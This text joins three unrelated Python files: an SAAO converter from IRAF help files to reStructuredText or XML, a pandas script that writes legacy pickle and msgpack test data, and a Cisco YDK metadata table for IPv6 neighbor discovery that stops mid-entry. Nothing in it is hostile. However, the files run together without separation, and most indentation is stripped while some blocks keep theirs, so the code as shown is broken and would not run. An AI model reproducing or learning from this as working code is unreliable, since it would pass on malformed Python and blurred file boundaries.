#!/usr/bin/env python
################################# LICENSE ##################################
# Copyright (c) 2009, South African Astronomical Observatory (SAAO) #
# All rights reserved. #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided that the following conditions #
# are met: #
# #
# * Redistributions of source code must retain the above copyright #
# notice, this list of conditions and the following disclaimer. #
# * Redistributions in binary form must reproduce the above copyright #
# notice, this list of conditions and the following disclaimer #
# in the documentation and/or other materials provided with the #
# distribution. #
# * Neither the name of the South African Astronomical Observatory #
# (SAAO) nor the names of its contributors may be used to endorse #
# or promote products derived from this software without specific #
# prior written permission. #
# #
# THIS SOFTWARE IS PROVIDED BY THE SAAO ''AS IS'' AND ANY EXPRESS OR #
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED #
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE #
# DISCLAIMED. IN NO EVENT SHALL THE SAAO BE LIABLE FOR ANY #
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL #
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS #
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) #
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, #
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN #
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE #
# POSSIBILITY OF SUCH DAMAGE. #
############################################################################
"""Tool to convert IRAF-style help files to reStructuredText or XML format."""
from __future__ import with_statement
import re
import xml.dom.minidom
class IrafHelpParser:
"""Parser used to convert IRAF style help files to ReStructuredText or XML format."""
def add_element(self,name,attribute=None):
"""Add element to DOM tree."""
element=self.dom.createElement(name)
if attribute is not None:
element.setAttribute('name',str(attribute))
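# minidom's appendChild returns the appended child, so current_node
# descends one level here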
self.current_node=self.current_node.appendChild(element)
def add_reference(self,key=None):
    """Add a reference element to the DOM tree."""
    self.add_element('reference',key)
def add_section(self,name=None):
"""Add section to DOM tree."""
if self.in_section:
self.move_up()
self.add_element('section',name)
self.in_section=True
def move_up(self):
    """Move up one level in the DOM tree."""
    self.current_node=self.current_node.parentNode
def add_text(self,s):
"""Add a text node to the DOM tree."""
self.current_node.appendChild(self.dom.createTextNode(s))
def __init__(self,filename):
    """Read *filename* and parse its markup into a DOM tree."""
    # Read the file into a list of lines and strip whitespace
    with open(filename) as f:
        lines=[l.strip() for l in f]
# Generate an empty DOM and set the current node to the root element
implement=xml.dom.minidom.getDOMImplementation()
self.dom=implement.createDocument(None, "document", None)
self.current_node=self.dom.documentElement
# Helper variables
self.in_document=False
self.in_section=False
while True:
try:
l=lines.pop(0)
if re.match(r'\.help',l):
    self.in_document=True
    name=re.split(r'\.help',l)[1].split()[0]
    self.add_element('help',name)
elif re.match(r'\.ih',l):
    name=lines.pop(0)
    self.add_section(name.capitalize())
    # Check for references
    if re.match('SEE ALSO',name.strip()):
        references=lines.pop(0)
        for r in references.split():
            self.add_reference(r.strip(',').strip())
elif re.match(r'\.nf',l):
    self.add_element('source')
elif re.match(r'\.fi',l):
    self.move_up()
elif re.match(r'\.ls',l):
    name=re.split(r'\.ls',l)[1]
    self.add_element('parameter',name)
elif re.match(r'\.le',l):
    self.move_up()
elif re.match(r'\.(ju|re|sh|br|ce|sp|in)',l):
    # Formatting directives with no DOM counterpart are ignored
    pass
elif re.match(r'\.endhelp',l):
    break
elif self.in_document:
    self.add_text(l)
except IndexError:
break
# Clean some redundant whitespace nodes
self.clean_tree()
def clean_tree(self):
"""Removes redundant blank lines."""
source_list=self.dom.getElementsByTagName('source')
# List of nodes to be deleted
delete=[]
def isempty(node):
if node is None:
return False
elif node.nodeType==node.TEXT_NODE and node.data.strip()=='':
return True
else:
return False
for node in source_list:
# Walk backwards through the preceding siblings
sibling=node.previousSibling
while isempty(sibling):
delete.append(sibling)
sibling=sibling.previousSibling
# Walk forwards through the following siblings
sibling=node.nextSibling
while isempty(sibling):
delete.append(sibling)
sibling=sibling.nextSibling
# Delete all marked nodes
for node in delete:
node.parentNode.removeChild(node)
def element_to_rst(self,node,indent=0):
"""Recursively move trough all child nodes of *node* and output ReStructuredText."""
rst=""
# Append a newline if the previous block was a source example
if node.previousSibling is not None and node.previousSibling.nodeName=='source':
rst+='\n'
if node.nodeType == node.TEXT_NODE:
if node.parentNode.nodeName=='source':
rst+=' '*indent+node.data+'\n'
else:
rst+=' '*indent+node.data.replace('"','``')+'\n'
elif node.nodeName == 'help':
name=node.getAttribute('name')
rst+='.. _'+name.strip()+':'+'\n\n'
rst+='*'*len(name)+'\n'
rst+=name+'\n'
rst+='*'*len(name)+'\n\n'
elif node.nodeName == 'section':
name=node.getAttribute('name')
rst+='\n'
rst+=name+'\n'
rst+='='*len(name)+'\n\n'
elif node.nodeName == 'parameter':
name=node.getAttribute('name')
rst+='\n'+'*'+name.strip()+'*'+'\n'
indent+=4
elif node.nodeName == 'source':
indent+=4
elif node.nodeName == 'reference':
name=node.getAttribute('name')
rst+=' :ref:`'+name.strip()+'`'
# Append :: if the next non-empty block is a source code example
if node.nextSibling is not None and node.nextSibling.nodeName=='source':
rst=rst.rstrip().rstrip('.').rstrip(':')+'::'+'\n\n'
# Recurse through child nodes if any
if node.hasChildNodes():
for e in node.childNodes:
rst+=self.element_to_rst(e,indent)
return rst
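# For illustration (hypothetical input), an IRAF help block such as
#
#   .help imstat
#   .ih
#   NAME
#   imstat -- compute image statistics
#   .endhelp
#
# renders roughly as
#
#   .. _imstat:
#
#   ******
#   imstat
#   ******
#
#   Name
#   ====
#
#   imstat -- compute image statistics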
def get_xml(self):
"""Return DOM tree as well formed XML."""
return self.dom.toprettyxml(indent=' ', newl='\n')
def get_rst(self):
"""Return ReStructuredText for entire DOM tree."""
rst=""
# Get root element
rst+=self.element_to_rst(self.dom)
return rst
def help2ReStructuredText(filename):
    """Convert an IRAF help file to reStructuredText format."""
    parser=IrafHelpParser(filename)
    return parser.get_rst()
def help2Xml(filename):
    """Convert an IRAF help file to XML format."""
    parser=IrafHelpParser(filename)
    return parser.get_xml()
if __name__ == "__main__":
import sys
print(help2ReStructuredText(sys.argv[1]))
""" self-contained to write legacy storage (pickle/msgpack) files """
from __future__ import print_function
from distutils.version import LooseVersion
from pandas import (Series, DataFrame, Panel,
SparseSeries, SparseDataFrame,
Index, MultiIndex, bdate_range, to_msgpack,
date_range, period_range,
Timestamp, NaT, Categorical, Period)
from pandas.compat import u
import os
import sys
import numpy as np
import pandas
import platform as pl
_loose_version = LooseVersion(pandas.__version__)
def _create_sp_series():
nan = np.nan
# nan-based
arr = np.arange(15, dtype=np.float64)
arr[7:12] = nan
arr[-1:] = nan
bseries = SparseSeries(arr, kind='block')
bseries.name = u'bseries'
return bseries
def _create_sp_tsseries():
nan = np.nan
# nan-based
arr = np.arange(15, dtype=np.float64)
arr[7:12] = nan
arr[-1:] = nan
date_index = bdate_range('1/1/2011', periods=len(arr))
bseries = SparseSeries(arr, index=date_index, kind='block')
bseries.name = u'btsseries'
return bseries
def _create_sp_frame():
nan = np.nan
data = {u'A': [nan, nan, nan, 0, 1, 2, 3, 4, 5, 6],
u'B': [0, 1, 2, nan, nan, nan, 3, 4, 5, 6],
u'C': np.arange(10).astype(np.int64),
u'D': [0, 1, 2, 3, 4, 5, nan, nan, nan, nan]}
dates = bdate_range('1/1/2011', periods=10)
return SparseDataFrame(data, index=dates)
def create_data():
""" create the pickle/msgpack data """
data = {
u'A': [0., 1., 2., 3., np.nan],
u'B': [0, 1, 0, 1, 0],
u'C': [u'foo1', u'foo2', u'foo3', u'foo4', u'foo5'],
u'D': date_range('1/1/2009', periods=5),
u'E': [0., 1, Timestamp('20100101'), u'foo', 2.]
}
scalars = dict(timestamp=Timestamp('20130101'),
period=Period('2012', 'M'))
index = dict(int=Index(np.arange(10)),
date=date_range('20130101', periods=10),
period=period_range('2013-01-01', freq='M', periods=10))
mi = dict(reg2=MultiIndex.from_tuples(
tuple(zip(*[[u'bar', u'bar', u'baz', u'baz', u'foo',
u'foo', u'qux', u'qux'],
[u'one', u'two', u'one', u'two', u'one',
u'two', u'one', u'two']])),
names=[u'first', u'second']))
series = dict(float=Series(data[u'A']),
int=Series(data[u'B']),
mixed=Series(data[u'E']),
ts=Series(np.arange(10).astype(np.int64),
index=date_range('20130101', periods=10)),
mi=Series(np.arange(5).astype(np.float64),
index=MultiIndex.from_tuples(
tuple(zip(*[[1, 1, 2, 2, 2],
[3, 4, 3, 4, 5]])),
names=[u'one', u'two'])),
dup=Series(np.arange(5).astype(np.float64),
index=[u'A', u'B', u'C', u'D', u'A']),
cat=Series(Categorical([u'foo', u'bar', u'baz'])),
dt=Series(date_range('20130101', periods=5)),
dt_tz=Series(date_range('20130101', periods=5,
tz='US/Eastern')),
period=Series([Period('2000Q1')] * 5))
mixed_dup_df = DataFrame(data)
mixed_dup_df.columns = list(u"ABCDA")
frame = dict(float=DataFrame({u'A': series[u'float'],
u'B': series[u'float'] + 1}),
int=DataFrame({u'A': series[u'int'],
u'B': series[u'int'] + 1}),
mixed=DataFrame({k: data[k]
for k in [u'A', u'B', u'C', u'D']}),
mi=DataFrame({u'A': np.arange(5).astype(np.float64),
u'B': np.arange(5).astype(np.int64)},
index=MultiIndex.from_tuples(
tuple(zip(*[[u'bar', u'bar', u'baz',
u'baz', u'baz'],
[u'one', u'two', u'one',
u'two', u'three']])),
names=[u'first', u'second'])),
dup=DataFrame(np.arange(15).reshape(5, 3).astype(np.float64),
columns=[u'A', u'B', u'A']),
cat_onecol=DataFrame({u'A': Categorical([u'foo', u'bar'])}),
cat_and_float=DataFrame({
u'A': Categorical([u'foo', u'bar', u'baz']),
u'B': np.arange(3).astype(np.int64)}),
mixed_dup=mixed_dup_df,
dt_mixed_tzs=DataFrame({
u'A': Timestamp('20130102', tz='US/Eastern'),
u'B': Timestamp('20130603', tz='CET')}, index=range(5))
)
mixed_dup_panel = Panel({u'ItemA': frame[u'float'],
u'ItemB': frame[u'int']})
mixed_dup_panel.items = [u'ItemA', u'ItemA']
panel = dict(float=Panel({u'ItemA': frame[u'float'],
u'ItemB': frame[u'float'] + 1}),
dup=Panel(np.arange(30).reshape(3, 5, 2).astype(np.float64),
items=[u'A', u'B', u'A']),
mixed_dup=mixed_dup_panel)
cat = dict(int8=Categorical(list('abcdefg')),
int16=Categorical(np.arange(1000)),
int32=Categorical(np.arange(10000)))
timestamp = dict(normal=Timestamp('2011-01-01'),
nat=NaT,
tz=Timestamp('2011-01-01', tz='US/Eastern'),
freq=Timestamp('2011-01-01', freq='D'),
both=Timestamp('2011-01-01', tz='Asia/Tokyo',
freq='M'))
return dict(series=series,
frame=frame,
panel=panel,
index=index,
scalars=scalars,
mi=mi,
sp_series=dict(float=_create_sp_series(),
ts=_create_sp_tsseries()),
sp_frame=dict(float=_create_sp_frame()),
cat=cat,
timestamp=timestamp)
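# The result is a two-level dict (kind -> name -> object), e.g.
# data['series']['float'] is a float64 Series; the writers below prune keys
# that older pandas versions cannot serialize.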
def create_pickle_data():
data = create_data()
# Pre-0.14.1 versions generated non-unpicklable mixed-type frames and
# panels if their columns/items were non-unique.
if _loose_version < '0.14.1':
del data['frame']['mixed_dup']
del data['panel']['mixed_dup']
if _loose_version < '0.17.0':
del data['series']['period']
del data['scalars']['period']
return data
def _u(x):
return {u(k): _u(x[k]) for k in x} if isinstance(x, dict) else x
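# e.g. _u({'a': {'b': 1}}) == {u'a': {u'b': 1}}; keys become unicode at every
# level, non-dict values pass through unchanged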
def create_msgpack_data():
data = create_data()
if _loose_version < '0.17.0':
del data['frame']['mixed_dup']
del data['panel']['mixed_dup']
del data['frame']['dup']
del data['panel']['dup']
if _loose_version < '0.18.0':
del data['series']['dt_tz']
del data['frame']['dt_mixed_tzs']
# Not supported
del data['sp_series']
del data['sp_frame']
del data['series']['cat']
del data['series']['period']
del data['frame']['cat_onecol']
del data['frame']['cat_and_float']
del data['scalars']['period']
return _u(data)
def platform_name():
return '_'.join([str(pandas.__version__), str(pl.machine()),
str(pl.system().lower()), str(pl.python_version())])
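# e.g. '0.18.1_x86_64_linux_2.7.11' (illustrative; the actual value depends on
# the pandas version and the build host)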
def write_legacy_pickles(output_dir):
# pandas.compat may not provide cPickle (e.g. on Python 3); fall back to
# the stdlib pickle
try:
    from pandas.compat import zip, cPickle as pickle  # noqa
except ImportError:
    import pickle
version = pandas.__version__
print("This script generates a storage file for the current arch, system, "
"and python version")
print(" pandas version: {0}".format(version))
print(" output dir : {0}".format(output_dir))
print(" storage format: pickle")
pth = '{0}.pickle'.format(platform_name())
with open(os.path.join(output_dir, pth), 'wb') as fh:
    pickle.dump(create_pickle_data(), fh, pickle.HIGHEST_PROTOCOL)
print("created pickle file: %s" % pth)
def write_legacy_msgpack(output_dir, compress):
version = pandas.__version__
print("This script generates a storage file for the current arch, "
"system, and python version")
print(" pandas version: {0}".format(version))
print(" output dir : {0}".format(output_dir))
print(" storage format: msgpack")
pth = '{0}.msgpack'.format(platform_name())
to_msgpack(os.path.join(output_dir, pth), create_msgpack_data(),
compress=compress)
print("created msgpack file: %s" % pth)
def write_legacy_file():
# ensure the current working directory is searched first for imports
sys.path.insert(0, '.')
if not (3 <= len(sys.argv) <= 4):
exit("Specify output directory and storage type: generate_legacy_"
"storage_files.py <output_dir> <storage_type> "
"<msgpack_compress_type>")
output_dir = str(sys.argv[1])
storage_type = str(sys.argv[2])
try:
compress_type = str(sys.argv[3])
except IndexError:
compress_type = None
if storage_type == 'pickle':
write_legacy_pickles(output_dir=output_dir)
elif storage_type == 'msgpack':
write_legacy_msgpack(output_dir=output_dir, compress=compress_type)
else:
exit("storage_type must be one of {'pickle', 'msgpack'}")
if __name__ == '__main__':
write_legacy_file()
import re
import collections
from enum import Enum
from ydk._core._dm_meta_info import _MetaInfoClassMember, _MetaInfoClass, _MetaInfoEnum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk._core._dm_meta_info import ATTRIBUTE, REFERENCE_CLASS, REFERENCE_LIST, REFERENCE_LEAFLIST, REFERENCE_IDENTITY_CLASS, REFERENCE_ENUM_CLASS, REFERENCE_BITS, REFERENCE_UNION
from ydk.errors import YPYError, YPYModelError
from ydk.providers._importer import _yang_ns
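# _meta_table maps generated YDK class paths to metadata: _MetaInfoEnum entries
# map YANG literal names to Python enum member names, while _MetaInfoClass
# entries describe a class's members, owning YANG module, element name, and
# namespace.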
_meta_table = {
'Ipv6NdShVrStateEnum' : _MetaInfoEnum('Ipv6NdShVrStateEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper',
{
'deleted':'DELETED',
'standby':'STANDBY',
'active':'ACTIVE',
}, 'Cisco-IOS-XR-ipv6-nd-oper', _yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper']),
'Ipv6NdShStateEnum' : _MetaInfoEnum('Ipv6NdShStateEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper',
{
'incomplete':'INCOMPLETE',
'reachable':'REACHABLE',
'stale':'STALE',
'glean':'GLEAN',
'delay':'DELAY',
'probe':'PROBE',
'delete':'DELETE',
}, 'Cisco-IOS-XR-ipv6-nd-oper', _yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper']),
'Ipv6NdMediaEncapEnum' : _MetaInfoEnum('Ipv6NdMediaEncapEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper',
{
'none':'NONE',
'arpa':'ARPA',
'snap':'SNAP',
'ieee802-1q':'IEEE802_1Q',
'srp':'SRP',
'srpa':'SRPA',
'srpb':'SRPB',
'ppp':'PPP',
'hdlc':'HDLC',
'chdlc':'CHDLC',
'dot1q':'DOT1Q',
'fr':'FR',
'gre':'GRE',
}, 'Cisco-IOS-XR-ipv6-nd-oper', _yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper']),
'Ipv6NdShVrFlagsEnum' : _MetaInfoEnum('Ipv6NdShVrFlagsEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper',
{
'no-flags':'NO_FLAGS',
'final-ra':'FINAL_RA',
}, 'Cisco-IOS-XR-ipv6-nd-oper', _yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper']),
'Ipv6NdBndlStateEnum' : _MetaInfoEnum('Ipv6NdBndlStateEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper',
{
'run':'RUN',
'error':'ERROR',
'wait':'WAIT',
}, 'Cisco-IOS-XR-ipv6-nd-oper', _yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper']),
'Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface.HostAddresses.HostAddress.LastReachedTime' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface.HostAddresses.HostAddress.LastReachedTime',
False,
[
_MetaInfoClassMember('seconds', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Number of seconds
''',
'seconds',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'last-reached-time',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface.HostAddresses.HostAddress' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface.HostAddresses.HostAddress',
False,
[
_MetaInfoClassMember('host-address', ATTRIBUTE, 'str' , None, None,
[], ['((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'],
''' Host Address
''',
'host_address',
'Cisco-IOS-XR-ipv6-nd-oper', True),
_MetaInfoClassMember('encapsulation', REFERENCE_ENUM_CLASS, 'Ipv6NdMediaEncapEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NdMediaEncapEnum',
[], [],
''' Preferred media encap type
''',
'encapsulation',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], [],
''' Interface name
''',
'interface_name',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('last-reached-time', REFERENCE_CLASS, 'LastReachedTime' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface.HostAddresses.HostAddress.LastReachedTime',
[], [],
''' Last time of reachability
''',
'last_reached_time',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('link-layer-address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Link-Layer Address
''',
'link_layer_address',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('location', ATTRIBUTE, 'str' , None, None,
[], ['([a-zA-Z0-9_]*\\d+/){1,2}([a-zA-Z0-9_]*\\d+)'],
''' Location where the neighbor entry exists
''',
'location',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('reachability-state', REFERENCE_ENUM_CLASS, 'Ipv6NdShStateEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NdShStateEnum',
[], [],
''' Current state
''',
'reachability_state',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('selected-encapsulation', REFERENCE_ENUM_CLASS, 'Ipv6NdMediaEncapEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NdMediaEncapEnum',
[], [],
''' Selected media encap
''',
'selected_encapsulation',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'host-address',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface.HostAddresses' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface.HostAddresses',
False,
[
_MetaInfoClassMember('host-address', REFERENCE_LIST, 'HostAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface.HostAddresses.HostAddress',
[], [],
''' IPv6 Neighbor detailed information
''',
'host_address',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'host-addresses',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3}\\d+)|(([a-zA-Z0-9_]*\\d+/){4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Interface Name
''',
'interface_name',
'Cisco-IOS-XR-ipv6-nd-oper', True),
_MetaInfoClassMember('host-addresses', REFERENCE_CLASS, 'HostAddresses' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface.HostAddresses',
[], [],
''' IPv6 node discovery list of neighbor host
addresses
''',
'host_addresses',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'neighbor-interface',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces',
False,
[
_MetaInfoClassMember('neighbor-interface', REFERENCE_LIST, 'NeighborInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.NeighborInterfaces.NeighborInterface',
[], [],
''' IPv6 node discovery neighbor interface
''',
'neighbor_interface',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'neighbor-interfaces',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.NeighborSummary.Multicast' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.NeighborSummary.Multicast',
False,
[
_MetaInfoClassMember('delayed-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total delayed entries
''',
'delayed_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('deleted-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total deleted entries
''',
'deleted_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('incomplete-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total incomplete entries
''',
'incomplete_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('probe-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total probe entries
''',
'probe_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('reachable-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total reachable entries
''',
'reachable_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('stale-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total stale entries
''',
'stale_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('subtotal-neighbor-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total number of entries
''',
'subtotal_neighbor_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'multicast',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.NeighborSummary.Static' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.NeighborSummary.Static',
False,
[
_MetaInfoClassMember('delayed-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total delayed entries
''',
'delayed_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('deleted-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total deleted entries
''',
'deleted_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('incomplete-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total incomplete entries
''',
'incomplete_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('probe-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total probe entries
''',
'probe_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('reachable-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total reachable entries
''',
'reachable_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('stale-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total stale entries
''',
'stale_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('subtotal-neighbor-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total number of entries
''',
'subtotal_neighbor_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'static',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.NeighborSummary.Dynamic' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.NeighborSummary.Dynamic',
False,
[
_MetaInfoClassMember('delayed-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total delayed entries
''',
'delayed_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('deleted-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total deleted entries
''',
'deleted_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('incomplete-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total incomplete entries
''',
'incomplete_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('probe-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total probe entries
''',
'probe_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('reachable-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total reachable entries
''',
'reachable_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('stale-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total stale entries
''',
'stale_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
_MetaInfoClassMember('subtotal-neighbor-entries', ATTRIBUTE, 'int' , None, None,
[(0, 4294967295)], [],
''' Total number of entries
''',
'subtotal_neighbor_entries',
'Cisco-IOS-XR-ipv6-nd-oper', False),
],
'Cisco-IOS-XR-ipv6-nd-oper',
'dynamic',
_yang_ns._namespaces['Cisco-IOS-XR-ipv6-nd-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper'
),
},
'Ipv6NodeDiscovery.Nodes.Node.NeighborSummary' : {
'meta_info' : _MetaInfoClass('Ipv6NodeDiscovery.Nodes.Node.NeighborSummary',
False,
[
_MetaInfoClassMember('dynamic', REFERENCE_CLASS, 'Dynamic' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv6_nd_oper', 'Ipv6NodeDiscovery.Nodes.Node.NeighborSummary.Dynamic',
[], [],
